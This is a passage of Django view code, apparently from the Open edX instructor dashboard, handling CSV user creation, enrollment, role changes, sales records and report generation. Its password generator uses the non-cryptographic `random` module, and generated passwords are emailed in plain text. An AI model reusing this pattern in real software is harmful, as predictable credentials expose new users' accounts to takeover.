                    # If username already exists in the database, then create_and_enroll_user
                    # will raise an IntegrityError exception.
                    password = generate_unique_password(generated_passwords)
                    errors = create_and_enroll_user(
                        email, username, name, country, password, course_id, course_mode, request.user, email_params
                    )
                    row_errors.extend(errors)
    else:
        general_errors.append({
            'username': '', 'email': '', 'response': _('File is not attached.')
        })
    results = {
        'row_errors': row_errors,
        'general_errors': general_errors,
        'warnings': warnings
    }
    return JsonResponse(results)
def generate_random_string(length):
    """
    Create a string of random characters of specified length.

    Vowels (either case), '1' and 'l' are excluded so the generated
    passwords avoid visually ambiguous characters and accidental words.
    """
    chars = [
        char for char in string.ascii_uppercase + string.digits + string.ascii_lowercase
        if char not in 'aAeEiIoOuU1l'
    ]
    # str.join instead of the deprecated string.join helper, which was
    # removed in Python 3; behavior is identical.
    return ''.join(random.choice(chars) for __ in range(length))
def generate_unique_password(generated_passwords, password_length=12):
    """
    Generate a password of `password_length` characters that has not been
    produced before, record it in `generated_passwords`, and return it.
    """
    while True:
        candidate = generate_random_string(password_length)
        if candidate not in generated_passwords:
            break
    generated_passwords.append(candidate)
    return candidate
def create_user_and_user_profile(email, username, name, country, password):
    """
    Create a new user, add a new Registration instance for letting user verify its identity and create a user profile.

    :param email: user's email address
    :param username: user's username
    :param name: user's name
    :param country: user's country
    :param password: user's password
    :return: User instance of the new user.
    """
    new_user = User.objects.create_user(username, email, password)

    # Attach a Registration so the account can later be activated/verified.
    registration = Registration()
    registration.register(new_user)

    # Persist the profile fields supplied for the new account.
    user_profile = UserProfile(user=new_user)
    user_profile.name = name
    user_profile.country = country
    user_profile.save()

    return new_user
def create_manual_course_enrollment(user, course_id, mode, enrolled_by, reason, state_transition):
    """
    Create course enrollment for the given student and create manual enrollment audit trail.

    :param user: User who is to enroll in course
    :param course_id: course identifier of the course in which to enroll the user.
    :param mode: mode for user enrollment, e.g. 'honor', 'audit' etc.
    :param enrolled_by: User who made the manual enrollment entry (usually instructor or support)
    :param reason: Reason behind manual enrollment
    :param state_transition: state transition denoting whether student enrolled from un-enrolled,
    un-enrolled from enrolled etc.
    :return CourseEnrollment instance.
    """
    new_enrollment = CourseEnrollment.enroll(user, course_id, mode=mode)

    # Record who performed the enrollment and why, for auditing.
    ManualEnrollmentAudit.create_manual_enrollment_audit(
        enrolled_by, user.email, state_transition, reason, new_enrollment
    )

    log.info(u'user %s enrolled in the course %s', user.username, course_id)
    return new_enrollment
def create_and_enroll_user(email, username, name, country, password, course_id, course_mode, enrolled_by, email_params):
    """
    Create a new user and enroll him/her to the given course, return list of errors in the following format
        Error format:
            each error is key-value pair dict with following key-value pairs.
            1. username: username of the user to enroll
            1. email: email of the user to enroll
            1. response: readable error message

    :param email: user's email address
    :param username: user's username
    :param name: user's name
    :param country: user's country
    :param password: user's password
    :param course_id: course identifier of the course in which to enroll the user.
    :param course_mode: mode for user enrollment, e.g. 'honor', 'audit' etc.
    :param enrolled_by: User who made the manual enrollment entry (usually instructor or support)
    :param email_params: information to send to the user via email
    :return: list of errors
    """
    errors = list()
    try:
        # Account creation and enrollment succeed or roll back together.
        with transaction.atomic():
            # Create a new user
            user = create_user_and_user_profile(email, username, name, country, password)
            # Enroll user to the course and add manual enrollment audit trail
            create_manual_course_enrollment(
                user=user,
                course_id=course_id,
                mode=course_mode,
                enrolled_by=enrolled_by,
                reason='Enrolling via csv upload',
                state_transition=UNENROLLED_TO_ENROLLED,
            )
    except IntegrityError:
        # The error message reflects the expected cause: the username is taken.
        errors.append({
            'username': username, 'email': email, 'response': _('Username {user} already exists.').format(user=username)
        })
    except Exception as ex:  # pylint: disable=broad-except
        # Any other failure is reported to the caller by exception class name.
        log.exception(type(ex).__name__)
        errors.append({
            'username': username, 'email': email, 'response': type(ex).__name__,
        })
    else:
        # Email is sent only after the transaction above committed successfully.
        try:
            # It's a new user, an email will be sent to each newly created user.
            email_params.update({
                'message': 'account_creation_and_enrollment',
                'email_address': email,
                'password': password,
                'platform_name': microsite.get_value('platform_name', settings.PLATFORM_NAME),
            })
            send_mail_to_student(email, email_params)
        except Exception as ex:  # pylint: disable=broad-except
            # The account exists but the credentials email failed; surface it as
            # a row error since the student cannot log in without it.
            log.exception(
                "Exception '{exception}' raised while sending email to new user.".format(exception=type(ex).__name__)
            )
            errors.append({
                'username': username,
                'email': email,
                'response':
                    _("Error '{error}' while sending email to new user (user email={email}). "
                      "Without the email student would not be able to login. "
                      "Please contact support for further information.").format(error=type(ex).__name__, email=email),
            })
        else:
            log.info(u'email sent to new created user at %s', email)
    return errors
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params(action="enroll or unenroll", identifiers="stringified list of emails and/or usernames")
def students_update_enrollment(request, course_id):
    """
    Enroll or unenroll students by email.
    Requires staff access.

    Query Parameters:
    - action in ['enroll', 'unenroll']
    - identifiers is string containing a list of emails and/or usernames separated by anything split_input_list can handle.
    - auto_enroll is a boolean (defaults to false)
        If auto_enroll is false, students will be allowed to enroll.
        If auto_enroll is true, students will be enrolled as soon as they register.
    - email_students is a boolean (defaults to false)
        If email_students is true, students will be sent email notification
        If email_students is false, students will not be sent email notification

    Returns an analog to this JSON structure: {
        "action": "enroll",
        "auto_enroll": false,
        "results": [
            {
                "email": "testemail@test.org",
                "before": {
                    "enrollment": false,
                    "auto_enroll": false,
                    "user": true,
                    "allowed": false
                },
                "after": {
                    "enrollment": true,
                    "auto_enroll": false,
                    "user": true,
                    "allowed": false
                }
            }
        ]
    }
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    action = request.POST.get('action')
    identifiers_raw = request.POST.get('identifiers')
    identifiers = _split_input_list(identifiers_raw)
    auto_enroll = request.POST.get('auto_enroll') in ['true', 'True', True]
    email_students = request.POST.get('email_students') in ['true', 'True', True]
    is_white_label = CourseMode.is_white_label(course_id)
    reason = request.POST.get('reason')
    # White-label courses require an explicit reason for the manual-enrollment audit.
    if is_white_label:
        if not reason:
            return JsonResponse(
                {
                    'action': action,
                    'results': [{'error': True}],
                    'auto_enroll': auto_enroll,
                }, status=400)
    enrollment_obj = None
    state_transition = DEFAULT_TRANSITION_STATE
    email_params = {}
    if email_students:
        course = get_course_by_id(course_id)
        email_params = get_email_params(course, auto_enroll, secure=request.is_secure())
    results = []
    for identifier in identifiers:
        # First try to get a user object from the identifer
        user = None
        email = None
        language = None
        try:
            user = get_student_from_identifier(identifier)
        except User.DoesNotExist:
            # No matching account: assume the identifier is an email address.
            email = identifier
        else:
            email = user.email
            language = get_user_email_language(user)
        try:
            # Use django.core.validators.validate_email to check email address
            # validity (obviously, cannot check if email actually /exists/,
            # simply that it is plausibly valid)
            validate_email(email)  # Raises ValidationError if invalid
            if action == 'enroll':
                before, after, enrollment_obj = enroll_email(
                    course_id, email, auto_enroll, email_students, email_params, language=language
                )
                before_enrollment = before.to_dict()['enrollment']
                before_user_registered = before.to_dict()['user']
                before_allowed = before.to_dict()['allowed']
                after_enrollment = after.to_dict()['enrollment']
                after_allowed = after.to_dict()['allowed']
                # Derive the audit-trail state transition from the before/after
                # enrollment snapshots.
                if before_user_registered:
                    if after_enrollment:
                        if before_enrollment:
                            state_transition = ENROLLED_TO_ENROLLED
                        else:
                            if before_allowed:
                                state_transition = ALLOWEDTOENROLL_TO_ENROLLED
                            else:
                                state_transition = UNENROLLED_TO_ENROLLED
                else:
                    if after_allowed:
                        state_transition = UNENROLLED_TO_ALLOWEDTOENROLL
            elif action == 'unenroll':
                before, after = unenroll_email(
                    course_id, email, email_students, email_params, language=language
                )
                before_enrollment = before.to_dict()['enrollment']
                before_allowed = before.to_dict()['allowed']
                # NOTE(review): `user` may still be None here (identifier was a
                # bare email) — presumably get_enrollment handles that; confirm.
                enrollment_obj = CourseEnrollment.get_enrollment(user, course_id)
                if before_enrollment:
                    state_transition = ENROLLED_TO_UNENROLLED
                else:
                    if before_allowed:
                        state_transition = ALLOWEDTOENROLL_TO_UNENROLLED
                    else:
                        state_transition = UNENROLLED_TO_UNENROLLED
            else:
                return HttpResponseBadRequest(strip_tags(
                    "Unrecognized action '{}'".format(action)
                ))
        except ValidationError:
            # Flag this email as an error if invalid, but continue checking
            # the remaining in the list
            results.append({
                'identifier': identifier,
                'invalidIdentifier': True,
            })
        except Exception as exc:  # pylint: disable=broad-except
            # catch and log any exceptions
            # so that one error doesn't cause a 500.
            # NOTE(review): the '#{}' placeholder below is never filled in.
            log.exception(u"Error while #{}ing student")
            log.exception(exc)
            results.append({
                'identifier': identifier,
                'error': True,
            })
        else:
            # Success: record the manual-enrollment audit entry for this student.
            ManualEnrollmentAudit.create_manual_enrollment_audit(
                request.user, email, state_transition, reason, enrollment_obj
            )
            results.append({
                'identifier': identifier,
                'before': before.to_dict(),
                'after': after.to_dict(),
            })
    response_payload = {
        'action': action,
        'results': results,
        'auto_enroll': auto_enroll,
    }
    return JsonResponse(response_payload)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@common_exceptions_400
@require_post_params(
    identifiers="stringified list of emails and/or usernames",
    action="add or remove",
)
def bulk_beta_modify_access(request, course_id):
    """
    Enroll or unenroll users in beta testing program.

    Query parameters:
    - identifiers is string containing a list of emails and/or usernames separated by
      anything split_input_list can handle.
    - action is one of ['add', 'remove']
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    action = request.POST.get('action')
    identifiers_raw = request.POST.get('identifiers')
    identifiers = _split_input_list(identifiers_raw)
    email_students = request.POST.get('email_students') in ['true', 'True', True]
    auto_enroll = request.POST.get('auto_enroll') in ['true', 'True', True]
    results = []
    rolename = 'beta'
    course = get_course_by_id(course_id)
    email_params = {}
    if email_students:
        secure = request.is_secure()
        email_params = get_email_params(course, auto_enroll=auto_enroll, secure=secure)
    for identifier in identifiers:
        try:
            error = False
            user_does_not_exist = False
            user = get_student_from_identifier(identifier)
            if action == 'add':
                allow_access(course, user, rolename)
            elif action == 'remove':
                revoke_access(course, user, rolename)
            else:
                # An unrecognized action aborts the whole request; the finally
                # clause below still appends a result row before returning.
                return HttpResponseBadRequest(strip_tags(
                    "Unrecognized action '{}'".format(action)
                ))
        except User.DoesNotExist:
            error = True
            user_does_not_exist = True
        # catch and log any unexpected exceptions
        # so that one error doesn't cause a 500.
        except Exception as exc:  # pylint: disable=broad-except
            # NOTE(review): the '#{}' placeholder below is never filled in.
            log.exception(u"Error while #{}ing student")
            log.exception(exc)
            error = True
        else:
            # If no exception thrown, see if we should send an email
            if email_students:
                send_beta_role_email(action, user, email_params)
            # See if we should autoenroll the student
            if auto_enroll:
                # Check if student is already enrolled
                if not CourseEnrollment.is_enrolled(user, course_id):
                    CourseEnrollment.enroll(user, course_id)
        finally:
            # Tabulate the action result of this email address
            results.append({
                'identifier': identifier,
                'error': error,
                'userDoesNotExist': user_does_not_exist
            })
    response_payload = {
        'action': action,
        'results': results,
    }
    return JsonResponse(response_payload)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@common_exceptions_400
@require_query_params(
    unique_student_identifier="email or username of user to change access",
    rolename="'instructor', 'staff', 'beta', or 'ccx_coach'",
    action="'allow' or 'revoke'"
)
def modify_access(request, course_id):
    """
    Modify staff/instructor access of other user.
    Requires instructor access.

    NOTE: instructors cannot remove their own instructor access.

    Query parameters:
    unique_student_identifer is the target user's username or email
    rolename is one of ['instructor', 'staff', 'beta', 'ccx_coach']
    action is one of ['allow', 'revoke']

    Each failed precondition returns a JSON payload with a distinct flag
    (userDoesNotExist / inactiveUser / removingSelfAsInstructor) so the
    dashboard can show a specific message; checks run in this order.
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_with_access(
        request.user, 'instructor', course_id, depth=None
    )
    try:
        user = get_student_from_identifier(request.GET.get('unique_student_identifier'))
    except User.DoesNotExist:
        response_payload = {
            'unique_student_identifier': request.GET.get('unique_student_identifier'),
            'userDoesNotExist': True,
        }
        return JsonResponse(response_payload)
    # Check that user is active, because add_users
    # in common/djangoapps/student/roles.py fails
    # silently when we try to add an inactive user.
    if not user.is_active:
        response_payload = {
            'unique_student_identifier': user.username,
            'inactiveUser': True,
        }
        return JsonResponse(response_payload)
    rolename = request.GET.get('rolename')
    action = request.GET.get('action')
    if rolename not in ROLES:
        error = strip_tags("unknown rolename '{}'".format(rolename))
        log.error(error)
        return HttpResponseBadRequest(error)
    # disallow instructors from removing their own instructor access.
    if rolename == 'instructor' and user == request.user and action != 'allow':
        response_payload = {
            'unique_student_identifier': user.username,
            'rolename': rolename,
            'action': action,
            'removingSelfAsInstructor': True,
        }
        return JsonResponse(response_payload)
    if action == 'allow':
        allow_access(course, user, rolename)
    elif action == 'revoke':
        revoke_access(course, user, rolename)
    else:
        return HttpResponseBadRequest(strip_tags(
            "unrecognized action '{}'".format(action)
        ))
    response_payload = {
        'unique_student_identifier': user.username,
        'rolename': rolename,
        'action': action,
        'success': 'yes',
    }
    return JsonResponse(response_payload)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@require_query_params(rolename="'instructor', 'staff', or 'beta'")
def list_course_role_members(request, course_id):
    """
    List instructors and staff.
    Requires instructor access.

    rolename is one of ['instructor', 'staff', 'beta', 'ccx_coach']

    Returns JSON of the form {
        "course_id": "some/course/id",
        "staff": [
            {
                "username": "staff1",
                "email": "staff1@example.org",
                "first_name": "Joe",
                "last_name": "Shmoe",
            }
        ]
    }
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_with_access(
        request.user, 'instructor', course_id, depth=None
    )

    rolename = request.GET.get('rolename')
    if rolename not in ROLES:
        return HttpResponseBadRequest()

    def extract_user_info(user):
        """ convert user into dicts for json view """
        return {
            'username': user.username,
            'email': user.email,
            'first_name': user.first_name,
            'last_name': user.last_name,
        }

    members = [extract_user_info(member) for member in list_with_level(course, rolename)]
    response_payload = {
        'course_id': course_id.to_deprecated_string(),
        rolename: members,
    }
    return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_problem_responses(request, course_id):
    """
    Initiate generation of a CSV file containing all student answers
    to a given problem.

    Responds with JSON
        {"status": "... status message ..."}

    if initiation is successful (or generation task is already running).

    Responds with BadRequest if problem location is faulty.
    """
    course_key = CourseKey.from_string(course_id)
    problem_location = request.GET.get('problem_location', '')

    try:
        problem_key = UsageKey.from_string(problem_location)
        # Are we dealing with an "old-style" problem location?
        if not problem_key.run:
            problem_key = course_key.make_usage_key_from_deprecated_string(problem_location)
        if problem_key.course_key != course_key:
            # Location parses but belongs to a different course.
            raise InvalidKeyError(type(problem_key), problem_key)
    except InvalidKeyError:
        return JsonResponseBadRequest(_("Could not find problem with this location."))

    try:
        instructor_task.api.submit_calculate_problem_responses_csv(request, course_key, problem_location)
    except AlreadyRunningError:
        already_running_status = _(
            "A problem responses report generation task is already in progress. "
            "Check the 'Pending Tasks' table for the status of the task. "
            "When completed, the report will be available for download in the table below."
        )
        return JsonResponse({"status": already_running_status})

    success_status = _(
        "The problem responses report is being created."
        " To view the status of the report, see Pending Tasks below."
    )
    return JsonResponse({"status": success_status})
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_grading_config(request, course_id):
    """
    Respond with json which contains a html formatted grade summary.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_with_access(
        request.user, 'staff', course_key, depth=None
    )
    return JsonResponse({
        'course_id': course_key.to_deprecated_string(),
        'grading_config_summary': instructor_analytics.basic.dump_grading_context(course),
    })
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_sale_records(request, course_id, csv=False):  # pylint: disable=unused-argument, redefined-outer-name
    """
    return the summary of all sales records for a particular course
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    query_features = [
        'company_name', 'company_contact_name', 'company_contact_email', 'total_codes', 'total_used_codes',
        'total_amount', 'created', 'customer_reference_number', 'recipient_name', 'recipient_email', 'created_by',
        'internal_reference', 'invoice_number', 'codes', 'course_id'
    ]
    sale_data = instructor_analytics.basic.sale_record_features(course_key, query_features)

    if csv:
        header, datarows = instructor_analytics.csvs.format_dictlist(sale_data, query_features)
        return instructor_analytics.csvs.create_csv_response("e-commerce_sale_invoice_records.csv", header, datarows)

    # JSON view: replace the User object with its username for serialization.
    for record in sale_data:
        record['created_by'] = record['created_by'].username
    return JsonResponse({
        'course_id': course_key.to_deprecated_string(),
        'sale': sale_data,
        'queried_features': query_features
    })
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_sale_order_records(request, course_id):  # pylint: disable=unused-argument
    """
    return the summary of all sales records for a particular course
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    # (database column, CSV header) pairs, in output order.
    query_features = [
        ('id', 'Order Id'),
        ('company_name', 'Company Name'),
        ('company_contact_name', 'Company Contact Name'),
        ('company_contact_email', 'Company Contact Email'),
        ('logged_in_username', 'Login Username'),
        ('logged_in_email', 'Login User Email'),
        ('purchase_time', 'Date of Sale'),
        ('customer_reference_number', 'Customer Reference Number'),
        ('recipient_name', 'Recipient Name'),
        ('recipient_email', 'Recipient Email'),
        ('bill_to_street1', 'Street 1'),
        ('bill_to_street2', 'Street 2'),
        ('bill_to_city', 'City'),
        ('bill_to_state', 'State'),
        ('bill_to_postalcode', 'Postal Code'),
        ('bill_to_country', 'Country'),
        ('order_type', 'Order Type'),
        ('status', 'Order Item Status'),
        ('coupon_code', 'Coupon Code'),
        ('list_price', 'List Price'),
        ('unit_cost', 'Unit Price'),
        ('quantity', 'Quantity'),
        ('total_discount', 'Total Discount'),
        ('total_amount', 'Total Amount Paid'),
    ]
    db_columns = [feature[0] for feature in query_features]
    csv_columns = [feature[1] for feature in query_features]

    sale_data = instructor_analytics.basic.sale_order_record_features(course_key, db_columns)
    __, datarows = instructor_analytics.csvs.format_dictlist(sale_data, db_columns)
    return instructor_analytics.csvs.create_csv_response("e-commerce_sale_order_records.csv", csv_columns, datarows)
@require_level('staff')
@require_POST
def sale_validation(request, course_id):
    """
    Invalidate or re-validate the sale tied to the posted invoice number,
    depending on the posted ``event_type``.
    """
    invoice_number = request.POST.get("invoice_number")
    if invoice_number is None:
        return HttpResponseBadRequest("Missing required invoice_number parameter")
    try:
        invoice_number = int(invoice_number)
    except ValueError:
        return HttpResponseBadRequest(
            "invoice_number must be an integer, {value} provided".format(
                value=invoice_number
            )
        )
    event_type = request.POST.get("event_type")
    if event_type is None:
        return HttpResponseBadRequest("Missing required event_type parameter")

    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    try:
        invoice_item = CourseRegistrationCodeInvoiceItem.objects.select_related('invoice').get(
            invoice_id=invoice_number,
            course_id=course_id
        )
    except CourseRegistrationCodeInvoiceItem.DoesNotExist:  # Check for old type invoices
        return HttpResponseNotFound(_("Invoice number '{num}' does not exist.").format(num=invoice_number))

    # Any event type other than "invalidate" re-activates the invoice.
    if event_type == "invalidate":
        return invalidate_invoice(invoice_item.invoice)
    return re_validate_invoice(invoice_item.invoice)
def invalidate_invoice(obj_invoice):
    """
    Mark the sale behind ``obj_invoice`` as invalid and answer with JSON.
    """
    if not obj_invoice.is_valid:
        # Already invalidated; nothing to do.
        return HttpResponseBadRequest(_("The sale associated with this invoice has already been invalidated."))
    obj_invoice.is_valid = False
    obj_invoice.save()
    return JsonResponse({
        'message': _('Invoice number {0} has been invalidated.').format(obj_invoice.id)
    })
def re_validate_invoice(obj_invoice):
    """
    Re-activate the sale behind ``obj_invoice`` and answer with JSON.
    """
    if obj_invoice.is_valid:
        # Nothing to re-activate.
        return HttpResponseBadRequest(_("This invoice is already active."))
    obj_invoice.is_valid = True
    obj_invoice.save()
    return JsonResponse({
        'message': _('The registration codes for invoice {0} have been re-activated.').format(obj_invoice.id)
    })
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_issued_certificates(request, course_id):
    """
    List the certificates issued for the course, as JSON by default or as a
    CSV download when the ``csv`` query parameter is 'true'.

    Arguments:
        course_id
    Returns:
        {"certificates": [{course_id: xyz, mode: 'honor'}, ...]}
    """
    course_key = CourseKey.from_string(course_id)
    wants_csv = request.GET.get('csv', 'false').lower() == 'true'
    query_features = ['course_id', 'mode', 'total_issued_certificate', 'report_run_date']
    # Human-readable/translatable header for each feature, in column order.
    query_features_names = [
        ('course_id', _('CourseID')),
        ('mode', _('Certificate Type')),
        ('total_issued_certificate', _('Total Certificates Issued')),
        ('report_run_date', _('Date Report Run'))
    ]
    certificates_data = instructor_analytics.basic.issued_certificates(course_key, query_features)
    if not wants_csv:
        return JsonResponse({
            'certificates': certificates_data,
            'queried_features': query_features,
            'feature_names': dict(query_features_names)
        })
    __, data_rows = instructor_analytics.csvs.format_dictlist(certificates_data, query_features)
    return instructor_analytics.csvs.create_csv_response(
        'issued_certificates.csv',
        [header for __, header in query_features_names],
        data_rows
    )
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_students_features(request, course_id, csv=False):  # pylint: disable=redefined-outer-name
    """
    Respond with json which contains a summary of all enrolled students profile information.

    Responds with JSON
        {"students": [{-student-info-}, ...]}

    When ``csv`` is truthy, instead submits an asynchronous task that builds
    the profile report as a CSV and responds with a status message.

    TO DO accept requests for different attribute sets.
    """
    course_key = CourseKey.from_string(course_id)
    course = get_course_by_id(course_key)
    available_features = instructor_analytics.basic.AVAILABLE_FEATURES

    # Allow for microsites to be able to define additional columns.
    # Note that adding additional columns has the potential to break
    # the student profile report due to a character limit on the
    # asynchronous job input which in this case is a JSON string
    # containing the list of columns to include in the report.
    # TODO: Refactor the student profile report code to remove the list of columns
    # that should be included in the report from the asynchronous job input.
    # We need to clone the list because we modify it below
    query_features = list(microsite.get_value('student_profile_download_fields', []))

    if not query_features:
        # Default column set when the microsite does not override it.
        query_features = [
            'id', 'username', 'name', 'email', 'language', 'location',
            'year_of_birth', 'gender', 'level_of_education', 'mailing_address',
            'goals',
        ]

    # Provide human-friendly and translatable names for these features. These names
    # will be displayed in the table generated in data_download.coffee. It is not (yet)
    # used as the header row in the CSV, but could be in the future.
    query_features_names = {
        'id': _('User ID'),
        'username': _('Username'),
        'name': _('Name'),
        'email': _('Email'),
        'language': _('Language'),
        'location': _('Location'),
        'year_of_birth': _('Birth Year'),
        'gender': _('Gender'),
        'level_of_education': _('Level of Education'),
        'mailing_address': _('Mailing Address'),
        'goals': _('Goals'),
    }

    if is_course_cohorted(course.id):
        # Translators: 'Cohort' refers to a group of students within a course.
        query_features.append('cohort')
        query_features_names['cohort'] = _('Cohort')

    if course.teams_enabled:
        query_features.append('team')
        query_features_names['team'] = _('Team')

    # For compatibility reasons, city and country should always appear last.
    query_features.append('city')
    query_features_names['city'] = _('City')
    query_features.append('country')
    query_features_names['country'] = _('Country')

    if not csv:
        # Synchronous JSON response with the full per-student feature rows.
        student_data = instructor_analytics.basic.enrolled_students_features(course_key, query_features)
        response_payload = {
            'course_id': unicode(course_key),
            'students': student_data,
            'students_count': len(student_data),
            'queried_features': query_features,
            'feature_names': query_features_names,
            'available_features': available_features,
        }
        return JsonResponse(response_payload)
    else:
        # CSV path: delegate to an asynchronous instructor task.
        try:
            instructor_task.api.submit_calculate_students_features_csv(request, course_key, query_features)
            success_status = _("The enrolled learner profile report is being created."
                               " To view the status of the report, see Pending Tasks below.")
            return JsonResponse({"status": success_status})
        except AlreadyRunningError:
            # The same report is already queued/running; report that instead.
            already_running_status = _(
                "This enrollment report is currently being created."
                " To view the status of the report, see Pending Tasks below."
                " You will be able to download the report when it is complete.")
            return JsonResponse({"status": already_running_status})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_students_who_may_enroll(request, course_id):
    """
    Initiate generation of a CSV file containing information about
    students who may enroll in a course.

    Responds with JSON
        {"status": "... status message ..."}
    """
    course_key = CourseKey.from_string(course_id)
    query_features = ['email']
    try:
        instructor_task.api.submit_calculate_may_enroll_csv(request, course_key, query_features)
    except AlreadyRunningError:
        # The report task was already queued by an earlier request.
        status = _(
            "This enrollment report is currently being created."
            " To view the status of the report, see Pending Tasks below."
            " You will be able to download the report when it is complete."
        )
    else:
        status = _(
            "The enrollment report is being created. This report contains"
            " information about learners who can enroll in the course."
            " To view the status of the report, see Pending Tasks below."
        )
    return JsonResponse({"status": status})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_POST
@require_level('staff')
def add_users_to_cohorts(request, course_id):
    """
    Accept an uploaded CSV (form key "uploaded-file") of cohort assignments and
    spawn a celery task to apply them; a results CSV becomes available via the
    data downloads section.
    """
    course_key = SlashSeparatedCourseKey.from_string(course_id)

    def check_columns(file_storage, file_to_validate):
        """
        Verifies that the expected columns are present.
        """
        with file_storage.open(file_to_validate) as f:
            reader = unicodecsv.reader(UniversalNewlineIterator(f), encoding='utf-8')
            try:
                fieldnames = next(reader)
            except StopIteration:
                # Empty file: no header row at all.
                fieldnames = []
            error = None
            if "cohort" not in fieldnames:
                error = _("The file must contain a 'cohort' column containing cohort names.")
            elif "email" not in fieldnames and "username" not in fieldnames:
                error = _("The file must contain a 'username' column, an 'email' column, or both.")
            if error:
                raise FileValidationException(error)

    try:
        __, filename = store_uploaded_file(
            request, 'uploaded-file', ['.csv'],
            course_and_time_based_filename_generator(course_key, "cohorts"),
            max_file_size=2000000,  # limit to 2 MB
            validator=check_columns
        )
        # The task will assume the default file storage.
        instructor_task.api.submit_cohort_students(request, course_key, filename)
    except (FileValidationException, PermissionDenied) as err:
        return JsonResponse({"error": unicode(err)}, status=400)
    return JsonResponse()
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_coupon_codes(request, course_id):  # pylint: disable=unused-argument
    """
    Return a CSV download summarizing every active coupon for the course.
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    coupons = Coupon.objects.filter(course_id=course_id)
    # (db field, CSV header) pairs; list order fixes the column order of the report.
    feature_pairs = [
        ('code', _('Coupon Code')),
        ('course_id', _('Course Id')),
        ('percentage_discount', _('% Discount')),
        ('description', _('Description')),
        ('expiration_date', _('Expiration Date')),
        ('is_active', _('Is Active')),
        ('code_redeemed_count', _('Code Redeemed Count')),
        ('total_discounted_seats', _('Total Discounted Seats')),
        ('total_discounted_amount', _('Total Discounted Amount')),
    ]
    db_columns = [field for field, __ in feature_pairs]
    csv_columns = [header for __, header in feature_pairs]
    coupons_list = instructor_analytics.basic.coupon_codes_features(db_columns, coupons, course_id)
    __, data_rows = instructor_analytics.csvs.format_dictlist(coupons_list, db_columns)
    return instructor_analytics.csvs.create_csv_response('Coupons.csv', csv_columns, data_rows)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_finance_admin
def get_enrollment_report(request, course_id):
    """
    Kick off generation of the detailed enrollment report for the course and
    answer with a JSON status message.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    try:
        instructor_task.api.submit_detailed_enrollment_features_csv(request, course_key)
    except AlreadyRunningError:
        # The report task was already queued by an earlier request.
        status = _("The detailed enrollment report is being created."
                   " To view the status of the report, see Pending Tasks below."
                   " You will be able to download the report when it is complete.")
    else:
        status = _("The detailed enrollment report is being created."
                   " To view the status of the report, see Pending Tasks below.")
    return JsonResponse({
        "status": status
    })
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_finance_admin
def get_exec_summary_report(request, course_id):
    """
    Kick off generation of the executive summary report for the course and
    answer with a JSON status message.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    try:
        instructor_task.api.submit_executive_summary_report(request, course_key)
    except AlreadyRunningError:
        # The report task was already queued by an earlier request.
        status_response = _(
            "The executive summary report is currently being created."
            " To view the status of the report, see Pending Tasks below."
            " You will be able to download the report when it is complete."
        )
    else:
        status_response = _("The executive summary report is being created."
                            " To view the status of the report, see Pending Tasks below.")
    return JsonResponse({
        "status": status_response
    })
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_course_survey_results(request, course_id):
    """
    Kick off generation of the survey results report for the course and answer
    with a JSON status message.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    try:
        instructor_task.api.submit_course_survey_report(request, course_key)
    except AlreadyRunningError:
        # The report task was already queued by an earlier request.
        status_response = _(
            "The survey report is currently being created."
            " To view the status of the report, see Pending Tasks below."
            " You will be able to download the report when it is complete."
        )
    else:
        status_response = _("The survey report is being created."
                            " To view the status of the report, see Pending Tasks below.")
    return JsonResponse({
        "status": status_response
    })
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_proctored_exam_results(request, course_id):
    """
    Kick off generation of the proctored exam results report for the course
    and answer with a JSON status message.
    """
    # Columns included in the generated report.
    query_features = [
        'user_email',
        'exam_name',
        'attempt_code',
        'allowed_time_limit_mins',
        'is_sample_attempt',
        'started_at',
        'completed_at',
        'status',
    ]
    course_key = CourseKey.from_string(course_id)
    try:
